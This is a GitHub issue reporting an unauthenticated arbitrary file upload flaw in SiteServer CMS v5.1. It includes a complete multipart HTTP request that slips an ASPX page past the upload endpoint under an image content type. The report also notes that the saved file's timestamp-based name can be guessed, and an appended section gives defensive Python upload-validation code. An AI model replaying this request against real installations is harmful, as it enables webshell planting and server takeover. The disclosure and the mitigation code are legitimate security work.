Unauthenticated arbitrary file upload getshell #3236

Open
sobinge opened this issue Oct 15, 2021 · 0 comments


sobinge commented Oct 15, 2021

Tested version: https://github.com/siteserver/cms/releases/download/siteserver-dev-v5.0.92/siteserver_install.zip
SiteServer: v5.1
Test environment: Windows 2012 R2
Database: SQL Server 2016
Vulnerable URL: /api/stl/actions/upload/1?type=GovPublicApply
(During testing, no system configuration of the program needs to be changed.)

Request body

```http
POST /api/stl/actions/upload/1?type=GovPublicApply HTTP/1.1
Host: 192.168.39.3:8099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------307288271314916491681521187278
Content-Length: 903
Origin: http://192.168.39.3:8099
Connection: close

-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="name"

111.png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="type"

image/png
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="lastModifiedDate"

2021/10/15 上午10:47:51
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="size"

5720
-----------------------------307288271314916491681521187278
Content-Disposition: form-data; name="upfile"; filename="111.aasspx"
Content-Type: image/png

<%@ Page Language="C#"%>
<% Response.Write("hello,world"); %>

-----------------------------307288271314916491681521187278--
```
The generated aspx filename is timestamp-based; in a black-box test it can be obtained by brute-force guessing.
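As an added illustration of the server-side checks this report calls for (example code, not SiteServer's own handler and not from the reporter): the multipart `filename` and the declared `Content-Type` are both client-controlled, so an upload handler should decide on an extension allowlist plus the file's own magic bytes, and store the result under a random name rather than one derived from the upload time. The image signatures, the executable-extension list and the sample payloads are assumptions constructed for this example.

```python
import os
import re
import secrets

# Allowed image extensions and the leading bytes each must carry (constructed
# for this example; extend per deployment policy).
IMAGE_SIGNATURES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}

# Server-executable extensions rejected anywhere in the name, so that
# "shell.aspx.png" and "a.asp;.png" fail even though they end in an image extension.
EXECUTABLE_EXT_RE = re.compile(
    r"\.(asp|aspx|ashx|asmx|cshtml|config|php|jsp)\b", re.IGNORECASE)

class UploadRejected(ValueError):
    pass

def validate_upload(filename: str, declared_type: str, data: bytes) -> str:
    """Return a random storage name for a valid image upload, or raise.

    `filename` and `declared_type` are never trusted; only the allowlisted
    extension and the file's own leading bytes decide.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path component
    if EXECUTABLE_EXT_RE.search(base):
        raise UploadRejected(f"executable extension in name: {base}")
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        raise UploadRejected(f"content does not match {ext} (declared {declared_type})")
    # Random name: cannot be located by guessing timestamps, and the extension
    # is the validated one rather than whatever the client sent.
    return secrets.token_hex(16) + ext

def is_accepted(filename: str, declared_type: str, data: bytes) -> bool:
    try:
        validate_upload(filename, declared_type, data)
        return True
    except UploadRejected:
        return False

# Constructed samples: a minimal PNG header and the page body from the report.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
ASPX_SAMPLE = b'<%@ Page Language="C#"%>\n<% Response.Write("hello,world"); %>'
```

These checks complement, and do not replace, requiring authentication on the upload endpoint itself.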

sobinge changed the title from "Arbitrary file upload getshell" to "Unauthenticated arbitrary file upload getshell" on Oct 15, 2021